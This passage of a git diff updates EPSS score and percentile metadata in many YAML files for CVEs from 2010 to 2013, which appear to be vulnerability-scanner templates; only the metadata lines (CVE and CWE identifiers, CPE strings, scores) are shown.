cwe-id: CWE-94 epss-score: 0.02847 - epss-percentile: 0.89579 + epss-percentile: 0.89585 cpe: cpe:2.3:a:visocrea:com_joomla_visites:1.1:rc2:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-2920.yaml b/http/cves/2010/CVE-2010-2920.yaml index eea0bec5a6..b849dd8552 100644 --- a/http/cves/2010/CVE-2010-2920.yaml +++ b/http/cves/2010/CVE-2010-2920.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-2920 cwe-id: CWE-22 epss-score: 0.03527 - epss-percentile: 0.90505 + epss-percentile: 0.90512 cpe: cpe:2.3:a:foobla:com_foobla_suggestions:1.5.1.2:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-3203.yaml b/http/cves/2010/CVE-2010-3203.yaml index cb1d2ccbf9..314a4e4465 100644 --- a/http/cves/2010/CVE-2010-3203.yaml +++ b/http/cves/2010/CVE-2010-3203.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-3203 cwe-id: CWE-22 epss-score: 0.00626 - epss-percentile: 0.76662 + epss-percentile: 0.76681 cpe: cpe:2.3:a:xmlswf:com_picsell:1.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-3426.yaml b/http/cves/2010/CVE-2010-3426.yaml index 46545db7c3..4f4fab1cef 100644 --- a/http/cves/2010/CVE-2010-3426.yaml +++ b/http/cves/2010/CVE-2010-3426.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2010-3426 cwe-id: CWE-22 epss-score: 0.00826 - epss-percentile: 0.80056 + epss-percentile: 0.80069 cpe: cpe:2.3:a:4you-studio:com_jphone:1.0:alpha3:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-4231.yaml b/http/cves/2010/CVE-2010-4231.yaml index b6ebe58c8c..71310d9d00 100644 --- a/http/cves/2010/CVE-2010-4231.yaml +++ b/http/cves/2010/CVE-2010-4231.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-4231 cwe-id: CWE-22 epss-score: 0.01615 - epss-percentile: 0.86062 + epss-percentile: 0.86067 cpe: cpe:2.3:a:camtron:cmnc-200_firmware:1.102a-008:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-4239.yaml b/http/cves/2010/CVE-2010-4239.yaml index 2275ac9b77..84a3042c35 100644 --- a/http/cves/2010/CVE-2010-4239.yaml +++ b/http/cves/2010/CVE-2010-4239.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2010-4239 cwe-id: CWE-20 epss-score: 0.03561 - epss-percentile: 0.90543 + epss-percentile: 0.9055 cpe: cpe:2.3:a:tiki:tikiwiki_cms\/groupware:5.2:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-4282.yaml b/http/cves/2010/CVE-2010-4282.yaml index 7e9fb510c2..04d9d668dd 100644 --- a/http/cves/2010/CVE-2010-4282.yaml +++ b/http/cves/2010/CVE-2010-4282.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2010-4282 cwe-id: CWE-22 epss-score: 0.01214 - epss-percentile: 0.83745 + epss-percentile: 0.83754 cpe: cpe:2.3:a:artica:pandora_fms:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-4617.yaml b/http/cves/2010/CVE-2010-4617.yaml index db7656554b..c5d530e324 100644 --- a/http/cves/2010/CVE-2010-4617.yaml +++ b/http/cves/2010/CVE-2010-4617.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-4617 cwe-id: CWE-22 epss-score: 0.00826 - epss-percentile: 0.80056 + epss-percentile: 0.80069 cpe: cpe:2.3:a:kanich:com_jotloader:2.2.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-4719.yaml b/http/cves/2010/CVE-2010-4719.yaml index 6b71c80558..02cc2692f8 100644 --- a/http/cves/2010/CVE-2010-4719.yaml +++ b/http/cves/2010/CVE-2010-4719.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2010-4719 cwe-id: CWE-22 epss-score: 0.04503 - epss-percentile: 0.9153 + epss-percentile: 0.91539 cpe: cpe:2.3:a:fxwebdesign:com_jradio:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-4769.yaml b/http/cves/2010/CVE-2010-4769.yaml index 6aff0bda96..c5d19eced6 100644 --- a/http/cves/2010/CVE-2010-4769.yaml +++ b/http/cves/2010/CVE-2010-4769.yaml @@ -15,7 +15,7 @@ info: cve-id: CVE-2010-4769 cwe-id: CWE-22 epss-score: 0.00938 - epss-percentile: 0.81348 + epss-percentile: 0.81361 cpe: cpe:2.3:a:janguo:com_jimtawl:1.0.2:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-4977.yaml b/http/cves/2010/CVE-2010-4977.yaml index e94ae7eabf..6c04f4ec53 100644 --- a/http/cves/2010/CVE-2010-4977.yaml +++ b/http/cves/2010/CVE-2010-4977.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2010-4977 cwe-id: CWE-89 epss-score: 0.002 - epss-percentile: 0.57643 + epss-percentile: 0.57674 cpe: cpe:2.3:a:miniwork:com_canteen:1.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-5028.yaml b/http/cves/2010/CVE-2010-5028.yaml index 681ec34926..0fffad2e6d 100644 --- a/http/cves/2010/CVE-2010-5028.yaml +++ b/http/cves/2010/CVE-2010-5028.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-5028 cwe-id: CWE-89 epss-score: 0.0136 - epss-percentile: 0.84761 + epss-percentile: 0.84767 cpe: cpe:2.3:a:harmistechnology:com_jejob:1.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-5278.yaml b/http/cves/2010/CVE-2010-5278.yaml index a84bd2ba6b..9785b2f5da 100644 --- a/http/cves/2010/CVE-2010-5278.yaml +++ b/http/cves/2010/CVE-2010-5278.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2010-5278 cwe-id: CWE-22 epss-score: 0.04725 - epss-percentile: 0.9173 + epss-percentile: 0.9174 cpe: cpe:2.3:a:modx:modx_revolution:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-5286.yaml b/http/cves/2010/CVE-2010-5286.yaml index 0f206de939..f627a7a8f4 100644 --- a/http/cves/2010/CVE-2010-5286.yaml +++ b/http/cves/2010/CVE-2010-5286.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2010-5286 cwe-id: CWE-22 epss-score: 0.04708 - epss-percentile: 0.91716 + epss-percentile: 0.91726 cpe: cpe:2.3:a:joobi:com_jstore:-:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2011/CVE-2011-0049.yaml b/http/cves/2011/CVE-2011-0049.yaml index 608b170a1b..10f1920d94 100644 --- a/http/cves/2011/CVE-2011-0049.yaml +++ b/http/cves/2011/CVE-2011-0049.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2011-0049 cwe-id: CWE-22 epss-score: 0.96615 - epss-percentile: 0.99496 + epss-percentile: 0.99497 cpe: cpe:2.3:a:mj2:majordomo_2:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2011/CVE-2011-1669.yaml b/http/cves/2011/CVE-2011-1669.yaml index 53b6f39488..dc2bc01aef 100644 --- a/http/cves/2011/CVE-2011-1669.yaml +++ b/http/cves/2011/CVE-2011-1669.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2011-1669 cwe-id: CWE-22 epss-score: 0.02966 - epss-percentile: 0.89757 + epss-percentile: 0.89763 cpe: cpe:2.3:a:mikoviny:wp_custom_pages:0.5.0.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2011/CVE-2011-2744.yaml b/http/cves/2011/CVE-2011-2744.yaml index 1b1436e09d..44369ad472 100644 --- a/http/cves/2011/CVE-2011-2744.yaml +++ b/http/cves/2011/CVE-2011-2744.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2011-2744 cwe-id: CWE-22 epss-score: 0.01541 - epss-percentile: 0.85689 + epss-percentile: 0.85695 cpe: cpe:2.3:a:chyrp:chyrp:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2011/CVE-2011-2780.yaml b/http/cves/2011/CVE-2011-2780.yaml index d974a22c5b..117fe17ee4 100644 --- a/http/cves/2011/CVE-2011-2780.yaml +++ b/http/cves/2011/CVE-2011-2780.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2011-2780 cwe-id: CWE-22 epss-score: 0.03327 - epss-percentile: 0.90268 + epss-percentile: 0.90273 cpe: cpe:2.3:a:chyrp:chyrp:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2011/CVE-2011-4336.yaml b/http/cves/2011/CVE-2011-4336.yaml index 696a88c529..8b03c57897 100644 --- a/http/cves/2011/CVE-2011-4336.yaml +++ b/http/cves/2011/CVE-2011-4336.yaml @@ -15,7 +15,7 @@ info: cve-id: CVE-2011-4336 cwe-id: CWE-79 epss-score: 0.00182 - epss-percentile: 0.55365 + epss-percentile: 0.55388 cpe: cpe:2.3:a:tiki:tikiwiki_cms\/groupware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2011/CVE-2011-4618.yaml b/http/cves/2011/CVE-2011-4618.yaml index a8bd5ebc7b..30c4720898 100644 --- a/http/cves/2011/CVE-2011-4618.yaml +++ b/http/cves/2011/CVE-2011-4618.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2011-4618 cwe-id: CWE-79 epss-score: 0.00746 - epss-percentile: 0.78863 + epss-percentile: 0.78874 cpe: cpe:2.3:a:simplerealtytheme:advanced_text_widget_plugin:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2011/CVE-2011-4624.yaml b/http/cves/2011/CVE-2011-4624.yaml index 21d7dbe495..64fd733b41 100644 --- a/http/cves/2011/CVE-2011-4624.yaml +++ b/http/cves/2011/CVE-2011-4624.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2011-4624 cwe-id: CWE-79 epss-score: 0.00301 - epss-percentile: 0.66155 + epss-percentile: 0.6619 cpe: cpe:2.3:a:codeasily:grand_flagallery:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2011/CVE-2011-4804.yaml b/http/cves/2011/CVE-2011-4804.yaml index b54b302417..f6deef1472 100644 --- a/http/cves/2011/CVE-2011-4804.yaml +++ b/http/cves/2011/CVE-2011-4804.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2011-4804 cwe-id: CWE-22 epss-score: 0.0358 - epss-percentile: 0.90573 + epss-percentile: 0.9058 cpe: cpe:2.3:a:foobla:com_obsuggest:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2011/CVE-2011-4926.yaml b/http/cves/2011/CVE-2011-4926.yaml index d66783c52c..c5bfc5ba14 100644 --- a/http/cves/2011/CVE-2011-4926.yaml +++ b/http/cves/2011/CVE-2011-4926.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2011-4926 cwe-id: CWE-79 epss-score: 0.01001 - epss-percentile: 0.81966 + epss-percentile: 0.81976 cpe: cpe:2.3:a:bueltge:adminimize:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2011/CVE-2011-5106.yaml b/http/cves/2011/CVE-2011-5106.yaml index da32e61316..0be8b7a591 100644 --- a/http/cves/2011/CVE-2011-5106.yaml +++ b/http/cves/2011/CVE-2011-5106.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2011-5106 cwe-id: CWE-79 epss-score: 0.00434 - epss-percentile: 0.71789 + epss-percentile: 0.71813 cpe: cpe:2.3:a:fractalia:flexible_custom_post_type:0.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2011/CVE-2011-5107.yaml b/http/cves/2011/CVE-2011-5107.yaml index 3b462c8b67..246fb9321d 100644 --- a/http/cves/2011/CVE-2011-5107.yaml +++ b/http/cves/2011/CVE-2011-5107.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2011-5107 cwe-id: CWE-79 epss-score: 0.00214 - epss-percentile: 0.59289 + epss-percentile: 0.5932 cpe: cpe:2.3:a:wordpress:alert_before_you_post:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2011/CVE-2011-5179.yaml b/http/cves/2011/CVE-2011-5179.yaml index 92cc6d276d..b3f5a792a8 100644 --- a/http/cves/2011/CVE-2011-5179.yaml +++ b/http/cves/2011/CVE-2011-5179.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2011-5179 cwe-id: CWE-79 epss-score: 0.00214 - epss-percentile: 0.59289 + epss-percentile: 0.5932 cpe: cpe:2.3:a:skysa:skysa_app_bar_integration_plugin:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2011/CVE-2011-5181.yaml b/http/cves/2011/CVE-2011-5181.yaml index 130dd84ea1..020343650a 100644 --- a/http/cves/2011/CVE-2011-5181.yaml +++ b/http/cves/2011/CVE-2011-5181.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2011-5181 cwe-id: CWE-79 epss-score: 0.0023 - epss-percentile: 0.60996 + epss-percentile: 0.61025 cpe: cpe:2.3:a:clickdesk:clickdesk_live_support-live_chat_plugin:2.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2011/CVE-2011-5252.yaml b/http/cves/2011/CVE-2011-5252.yaml index 2f5f699d6e..91ab7efc16 100644 --- a/http/cves/2011/CVE-2011-5252.yaml +++ b/http/cves/2011/CVE-2011-5252.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2011-5252 cwe-id: CWE-20 epss-score: 0.02747 - epss-percentile: 0.89422 + epss-percentile: 0.89429 cpe: cpe:2.3:a:orchardproject:orchard:1.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2011/CVE-2011-5265.yaml b/http/cves/2011/CVE-2011-5265.yaml index 00ec60e93e..86ae533b11 100644 --- a/http/cves/2011/CVE-2011-5265.yaml +++ b/http/cves/2011/CVE-2011-5265.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2011-5265 cwe-id: CWE-79 epss-score: 0.00305 - epss-percentile: 0.66386 + epss-percentile: 0.6642 cpe: cpe:2.3:a:featurific_for_wordpress_project:featurific-for-wordpress:1.6.2:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2012/CVE-2012-0392.yaml b/http/cves/2012/CVE-2012-0392.yaml index 838fbcfc5c..a859b3dbe0 100644 --- a/http/cves/2012/CVE-2012-0392.yaml +++ b/http/cves/2012/CVE-2012-0392.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2012-0392 cwe-id: NVD-CWE-noinfo epss-score: 0.97059 - epss-percentile: 0.99679 + epss-percentile: 0.9968 cpe: cpe:2.3:a:apache:struts:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2012/CVE-2012-0394.yaml b/http/cves/2012/CVE-2012-0394.yaml index 5f7c21efd9..09c1e047da 100644 --- a/http/cves/2012/CVE-2012-0394.yaml +++ b/http/cves/2012/CVE-2012-0394.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2012-0394 cwe-id: CWE-94 epss-score: 0.95611 - epss-percentile: 0.99202 + epss-percentile: 0.99203 cpe: cpe:2.3:a:apache:struts:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2012/CVE-2012-0896.yaml b/http/cves/2012/CVE-2012-0896.yaml index da59622789..0b443e285c 100644 --- a/http/cves/2012/CVE-2012-0896.yaml +++ b/http/cves/2012/CVE-2012-0896.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2012-0896 cwe-id: CWE-22 epss-score: 0.02262 - epss-percentile: 0.88397 + epss-percentile: 0.88401 cpe: cpe:2.3:a:count_per_day_project:count_per_day:2.2:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2012/CVE-2012-0901.yaml b/http/cves/2012/CVE-2012-0901.yaml index 8446b35fcf..a520298feb 100644 --- a/http/cves/2012/CVE-2012-0901.yaml +++ b/http/cves/2012/CVE-2012-0901.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2012-0901 cwe-id: CWE-79 epss-score: 0.00216 - epss-percentile: 0.59413 + epss-percentile: 0.59446 cpe: cpe:2.3:a:attenzione:yousaytoo:1.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2012/CVE-2012-0981.yaml b/http/cves/2012/CVE-2012-0981.yaml index 56845a62f8..dcb54a7b59 100644 --- a/http/cves/2012/CVE-2012-0981.yaml +++ b/http/cves/2012/CVE-2012-0981.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2012-0981 cwe-id: CWE-22 epss-score: 0.02053 - epss-percentile: 0.87774 + epss-percentile: 0.8778 cpe: cpe:2.3:a:kybernetika:phpshowtime:2.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2012/CVE-2012-0991.yaml b/http/cves/2012/CVE-2012-0991.yaml index cfe6ca33f8..53497d1438 100644 --- a/http/cves/2012/CVE-2012-0991.yaml +++ b/http/cves/2012/CVE-2012-0991.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2012-0991 cwe-id: CWE-22 epss-score: 0.8848 - epss-percentile: 0.9835 + epss-percentile: 0.98352 cpe: cpe:2.3:a:openemr:openemr:4.1.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2012/CVE-2012-0996.yaml b/http/cves/2012/CVE-2012-0996.yaml index 8fee61d33d..778920dd7b 100644 --- a/http/cves/2012/CVE-2012-0996.yaml +++ b/http/cves/2012/CVE-2012-0996.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2012-0996 cwe-id: CWE-22 epss-score: 0.01048 - epss-percentile: 0.82387 + epss-percentile: 0.82399 cpe: cpe:2.3:a:11in1:11in1:1.2.1:stable_12-31-2011:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2012/CVE-2012-1226.yaml b/http/cves/2012/CVE-2012-1226.yaml index fe10cedb3f..bb19e0e6ab 100644 --- a/http/cves/2012/CVE-2012-1226.yaml +++ b/http/cves/2012/CVE-2012-1226.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2012-1226 cwe-id: CWE-22 epss-score: 0.10469 - epss-percentile: 0.94381 + epss-percentile: 0.94386 cpe: cpe:2.3:a:dolibarr:dolibarr_erp\/crm:3.2.0:alpha:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2012/CVE-2012-1823.yaml b/http/cves/2012/CVE-2012-1823.yaml index ac0973b214..c5acb2015f 100644 --- a/http/cves/2012/CVE-2012-1823.yaml +++ b/http/cves/2012/CVE-2012-1823.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2012-1823 cwe-id: CWE-20 epss-score: 0.97491 - epss-percentile: 0.9997 + epss-percentile: 0.99969 cpe: cpe:2.3:a:php:php:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2012/CVE-2012-1835.yaml b/http/cves/2012/CVE-2012-1835.yaml index a20e786782..1420452b3d 100644 --- a/http/cves/2012/CVE-2012-1835.yaml +++ b/http/cves/2012/CVE-2012-1835.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2012-1835 cwe-id: CWE-79 epss-score: 0.00229 - epss-percentile: 0.60938 + epss-percentile: 0.60966 cpe: cpe:2.3:a:timely:all-in-one_event_calendar:1.4:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2012/CVE-2012-2371.yaml b/http/cves/2012/CVE-2012-2371.yaml index 4c11206ec2..1f8bc49c44 100644 --- a/http/cves/2012/CVE-2012-2371.yaml +++ b/http/cves/2012/CVE-2012-2371.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2012-2371 cwe-id: CWE-79 epss-score: 0.00605 - epss-percentile: 0.76205 + epss-percentile: 0.76227 cpe: cpe:2.3:a:mnt-tech:wp-facethumb:0.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2012/CVE-2012-3153.yaml b/http/cves/2012/CVE-2012-3153.yaml index 95e30f201c..3f49e1b01d 100644 --- a/http/cves/2012/CVE-2012-3153.yaml +++ b/http/cves/2012/CVE-2012-3153.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2012-3153 cwe-id: NVD-CWE-noinfo epss-score: 0.97048 - epss-percentile: 0.99671 + epss-percentile: 0.99672 cpe: cpe:2.3:a:oracle:fusion_middleware:11.1.1.4.0:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2012/CVE-2012-4032.yaml b/http/cves/2012/CVE-2012-4032.yaml index 3960e05286..d4eb82c841 100644 --- a/http/cves/2012/CVE-2012-4032.yaml +++ b/http/cves/2012/CVE-2012-4032.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2012-4032 cwe-id: CWE-20 epss-score: 0.00951 - epss-percentile: 0.81477 + epss-percentile: 0.8149 cpe: cpe:2.3:a:websitepanel:websitepanel:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2012/CVE-2012-4242.yaml b/http/cves/2012/CVE-2012-4242.yaml index 299bb263ae..8f00a89f23 100644 --- a/http/cves/2012/CVE-2012-4242.yaml +++ b/http/cves/2012/CVE-2012-4242.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2012-4242 cwe-id: CWE-79 epss-score: 0.00216 - epss-percentile: 0.59429 + epss-percentile: 0.59462 cpe: cpe:2.3:a:mf_gig_calendar_project:mf_gig_calendar:0.9.2:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2012/CVE-2012-4253.yaml b/http/cves/2012/CVE-2012-4253.yaml index 84eb2df24d..9a9471efac 100644 --- a/http/cves/2012/CVE-2012-4253.yaml +++ b/http/cves/2012/CVE-2012-4253.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2012-4253 cwe-id: CWE-22 epss-score: 0.02906 - epss-percentile: 0.89672 + epss-percentile: 0.89678 cpe: cpe:2.3:a:mysqldumper:mysqldumper:1.24.4:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2012/CVE-2012-4273.yaml b/http/cves/2012/CVE-2012-4273.yaml index 9111852027..f7fe9c4e6c 100644 --- a/http/cves/2012/CVE-2012-4273.yaml +++ b/http/cves/2012/CVE-2012-4273.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2012-4273 cwe-id: CWE-79 epss-score: 0.00252 - epss-percentile: 0.62913 + epss-percentile: 0.62941 cpe: cpe:2.3:a:ppfeufer:2-click-social-media-buttons:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2012/CVE-2012-4547.yaml b/http/cves/2012/CVE-2012-4547.yaml index 9f91d6782f..2e7a63c145 100644 --- a/http/cves/2012/CVE-2012-4547.yaml +++ b/http/cves/2012/CVE-2012-4547.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2012-4547 cwe-id: CWE-79 epss-score: 0.0023 - epss-percentile: 0.61056 + epss-percentile: 0.61083 cpe: cpe:2.3:a:laurent_destailleur:awstats:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2012/CVE-2012-4768.yaml b/http/cves/2012/CVE-2012-4768.yaml index c9b52f1e1a..a2ace2a4c0 100644 --- a/http/cves/2012/CVE-2012-4768.yaml +++ b/http/cves/2012/CVE-2012-4768.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2012-4768 cwe-id: CWE-79 epss-score: 0.00922 - epss-percentile: 0.81185 + epss-percentile: 0.81197 cpe: cpe:2.3:a:mikejolley:download_monitor:3.3.5.7:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2012/CVE-2012-4878.yaml b/http/cves/2012/CVE-2012-4878.yaml index 5212448ae8..f12ada1149 100644 --- a/http/cves/2012/CVE-2012-4878.yaml +++ b/http/cves/2012/CVE-2012-4878.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2012-4878 cwe-id: CWE-22 epss-score: 0.00954 - epss-percentile: 0.81532 + epss-percentile: 0.81544 cpe: cpe:2.3:a:flatnux:flatnux:2011-08-09-2:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2012/CVE-2012-4889.yaml b/http/cves/2012/CVE-2012-4889.yaml index 0390f9b1f7..993cdf0d2d 100644 --- a/http/cves/2012/CVE-2012-4889.yaml +++ b/http/cves/2012/CVE-2012-4889.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2012-4889 cwe-id: CWE-79 epss-score: 0.03526 - epss-percentile: 0.90502 + epss-percentile: 0.90509 cpe: cpe:2.3:a:manageengine:firewall_analyzer:7.2:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2012/CVE-2012-4940.yaml b/http/cves/2012/CVE-2012-4940.yaml index a7625f6075..fa39c90a52 100644 --- a/http/cves/2012/CVE-2012-4940.yaml +++ b/http/cves/2012/CVE-2012-4940.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2012-4940 cwe-id: CWE-22 epss-score: 0.04527 - epss-percentile: 0.91548 + epss-percentile: 0.91559 cpe: cpe:2.3:a:gecad:axigen_free_mail_server:-:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2012/CVE-2012-4982.yaml b/http/cves/2012/CVE-2012-4982.yaml index 0c3a8d14b6..3f90421eda 100644 --- a/http/cves/2012/CVE-2012-4982.yaml +++ b/http/cves/2012/CVE-2012-4982.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2012-4982 cwe-id: CWE-20 epss-score: 0.00763 - epss-percentile: 0.79151 + epss-percentile: 0.79159 cpe: cpe:2.3:a:forescout:counteract:6.3.4.10:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2012/CVE-2012-5321.yaml b/http/cves/2012/CVE-2012-5321.yaml index e505fc222e..c7512afc41 100644 --- a/http/cves/2012/CVE-2012-5321.yaml +++ b/http/cves/2012/CVE-2012-5321.yaml @@ -18,8 +18,8 @@ info: cvss-score: 5.8 cve-id: CVE-2012-5321 cwe-id: CWE-20 - epss-score: 0.02634 - epss-percentile: 0.89195 + epss-score: 0.02432 + epss-percentile: 0.88791 cpe: cpe:2.3:a:tiki:tikiwiki_cms\/groupware:8.3:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2012/CVE-2012-5913.yaml b/http/cves/2012/CVE-2012-5913.yaml index 5a7565ea70..9d18a5b20a 100644 --- a/http/cves/2012/CVE-2012-5913.yaml +++ b/http/cves/2012/CVE-2012-5913.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2012-5913 cwe-id: CWE-79 epss-score: 0.00828 - epss-percentile: 0.80075 + epss-percentile: 0.80088 cpe: cpe:2.3:a:wordpress_integrator_project:wordpress_integrator:1.32:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2012/CVE-2012-6499.yaml b/http/cves/2012/CVE-2012-6499.yaml index 88fcb736e4..1528b7bccc 100644 --- a/http/cves/2012/CVE-2012-6499.yaml +++ b/http/cves/2012/CVE-2012-6499.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2012-6499 cwe-id: CWE-20 epss-score: 0.01204 - epss-percentile: 0.8369 + epss-percentile: 0.83699 cpe: cpe:2.3:a:age_verification_project:age_verification:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2013/CVE-2013-1965.yaml b/http/cves/2013/CVE-2013-1965.yaml index 628d0430be..4f5a31925e 100644 --- a/http/cves/2013/CVE-2013-1965.yaml +++ b/http/cves/2013/CVE-2013-1965.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2013-1965 cwe-id: CWE-94 epss-score: 0.00813 - epss-percentile: 0.79896 + epss-percentile: 0.79907 cpe: cpe:2.3:a:apache:struts:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2013/CVE-2013-2287.yaml b/http/cves/2013/CVE-2013-2287.yaml index 59587c5dd3..d58ab1047f 100644 --- a/http/cves/2013/CVE-2013-2287.yaml +++ b/http/cves/2013/CVE-2013-2287.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2013-2287 cwe-id: CWE-79 epss-score: 0.00219 - epss-percentile: 0.59735 + epss-percentile: 0.59769 cpe: cpe:2.3:a:roberta_bramski:uploader:1.0.4:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2013/CVE-2013-2621.yaml b/http/cves/2013/CVE-2013-2621.yaml index b9a3db0a4d..0c7296ac34 100644 --- a/http/cves/2013/CVE-2013-2621.yaml +++ b/http/cves/2013/CVE-2013-2621.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2013-2621 cwe-id: CWE-601 epss-score: 0.03563 - epss-percentile: 0.90547 + epss-percentile: 0.90554 cpe: cpe:2.3:a:telaen_project:telaen:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2013/CVE-2013-3526.yaml b/http/cves/2013/CVE-2013-3526.yaml index ab9f66453e..dadea0271c 100644 --- a/http/cves/2013/CVE-2013-3526.yaml +++ b/http/cves/2013/CVE-2013-3526.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2013-3526 cwe-id: CWE-79 epss-score: 0.00431 - epss-percentile: 0.71686 + epss-percentile: 0.71709 cpe: 